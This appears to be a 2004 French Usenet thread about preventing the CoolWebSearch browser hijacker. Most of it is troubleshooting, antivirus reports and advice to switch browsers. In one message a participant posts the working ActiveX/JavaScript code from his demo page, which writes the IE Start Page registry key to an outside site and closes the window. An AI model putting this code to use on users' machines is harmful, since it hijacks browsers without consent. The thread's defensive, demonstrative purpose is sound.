Prévention CoolWebSearch

JacK
Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
---***ANTISPAM***---
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK

Artic-C
Bonjour * JacK* qui nous dit :

Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx

il y a un problème lorsque je clique sur le lien dans ton blog ou que même
si je le re-copie dans la barre d'adresse IE, mon IE6 se referme, chose qui
ne m'arrive que sur le lien qui mène à
http://babin.nelly.free.fr/spyware_1.htm

JacK [MVP]
sur les news:%
¥©¥ [MVP] ¥©¥@artic.qc.ca> signalait:
[...]

Hello,

Ce n'est pas un problème mais un petit coup de vice si IE n'est pas
configuré convenablement :-D

Si pas à jour, Optimix s'installe en page de démarrage.

Si à jour, l'exploit ne peut s'effectuer et la page se ferme sans
avertissement.
Si bon réglage d'IE et à jour, il y a une alerte signalant quela page en
cours cherche à fermer lafenêtre et te demande si tu veux accepter ou non.

Je vous laisse chercher les bons réglages pour avoir accès avec IE :-D
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
---***ANTISPAM***---
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK

Fabrice [MVP]
Salut,

Et l'affichage de ce site :
http://babin.nelly.free.fr/spyware_1.htm
Avec Kaspersky 5 provoque l'apparition d'une fenêtre qui bloque l'accès au
site.
Tentative d'installation :
Torjan.JS.Seeker-based

Fabrice
Microsoft MVP
http://www.fab3d.fr.st
Faq Windows XP :

raison."

" ¥©¥ [MVP]" ¥©¥@artic.qc.ca> a écrit dans le message de
news: %
[...]

Hello JacK [MVP] !
[...]

mdr mdr mdr
En plus c'est formateur!
Ah ce Jack!

--
Bien cordialement,
Aide toi le ciel t'aidera : http://bailly.chez.tiscali.fr/Forums.htm

Milo
JacK wrote:
:: Salut,
::
:: Un des BHO les plus vicieux à éradiquer.
::
:: Prévenir vaut mieux que guérir.
:: http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx

Bonsoir JacK
je suppose que ce que tu propose est aussi valable pour Windows Me, par
contre lorsque j'arrive sur la page du lien ci dessus, en cliquant "cette
page" il ne sepasse rien, est ce les règle de message OE, outclok, autres ,
je ne sais pas.
merci de me dire ce que je peux faire pour télécharger ton patch.

--
A+
Milo
JacK [MVP]
sur les news:%23wHR5%
Milo signalait:
JacK wrote:
[...]

Attendre que quelqu'un explique comment il a réglé IE pour avoir accès ;)
Ça ne pose pas de problème insurmontable.

Si pas de réponse d'ici demain, j'expliquerai le truc ;).

Milo
JacK [MVP] wrote:
:: sur les news:%
:: ¥©¥ [MVP] ¥©¥@artic.qc.ca> signalait:
::: Bonjour * JacK* qui nous dit :
:::
:::: Salut,
::::
[...]

RE,
Bon, je vais attendre d'autres explications, car pour moi c'est du chinois
pour le moment.
Mon ie6 est à jour, le reglage??? that is the question. Comme je pars et je
reviens le 16, d'ici là, j'aurai peut être la soluce.
Bonne soirée

--
A+
Milo
JacK [MVP]
sur les news:
Fabrice [MVP] signalait:
Salut,

Et l'affichage de ce site :
http://babin.nelly.free.fr/spyware_1.htm
Avec Kaspersky 5 provoque l'apparition d'une fenêtre qui bloque
l'accès au site.
Tentative d'installation :
Torjan.JS.Seeker-based

Hello Fabrice,

En effet, je me suis basé sur le code d'un trojan pour faire ce petit machin
mais je te rassure, il ne s'agit pas d'un trojan mais d'un browser hijack
"maison" que Microsoft a partiellement résolu : la page ne s'ouvre pas parce
qu'IE panique :-D
Plus sérieusement, en cas de vulnérabilité, la page se ferme et àla
réouverture la home page est optimix.

J'avais signalé en son temps (plus de 6 mois sur bugtraq et à MS cette
vulnérabilité :-D)

Comme précisé, avec des paramètres IE ad hoc, il y a une boîte de dialogue
proposant une action et l'ouverture de la page sans dommage.

Il m'arrive de temps en temps d'être d'humeur folâtre lol

Pour info, voici le code inséré :

<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainStart
Page", "http://www.optimix.be.tf")
</script>
<script language=javascript>
self.close()
</script>

http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
---***ANTISPAM***---
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK

Milo
JacK [MVP] wrote:
:: sur les news:%23wHR5%
:: Milo signalait:
::: JacK wrote:
::::: Salut,
:::::
[...]

Re, JacK
Comme d'hab t'es sympa et surtout competent. je veux bien pour demain mais
je ne reviens que le 15 ou le 16, j'y serai à mon retour
merci
Bonne soirée à toi

--
A+
Milo
Claude LaFrenière [climenole]
Le 3 août 2004

Bonjour Milo :-D

Dans le Msg ID <news:

JacK [MVP] wrote:

[...]

Simple : utilise un autre navigateur (Opera ou Mozilla).
Pas d'activeX pas de problèmes...

Bonne vacances :-)

--
[Tenez le forum au courant / suivi sur le même fil de discussion s.v.p.]
{ Msg ID Cf.: http://www.google.fr/grphp?hl=fr&tab=wg&q= }

Courriel http://cerbermail.com/?FslokTsjQ7
PGP ID http://pgpkeys.mit.edu:11371 0xC3C0E2C2

1 2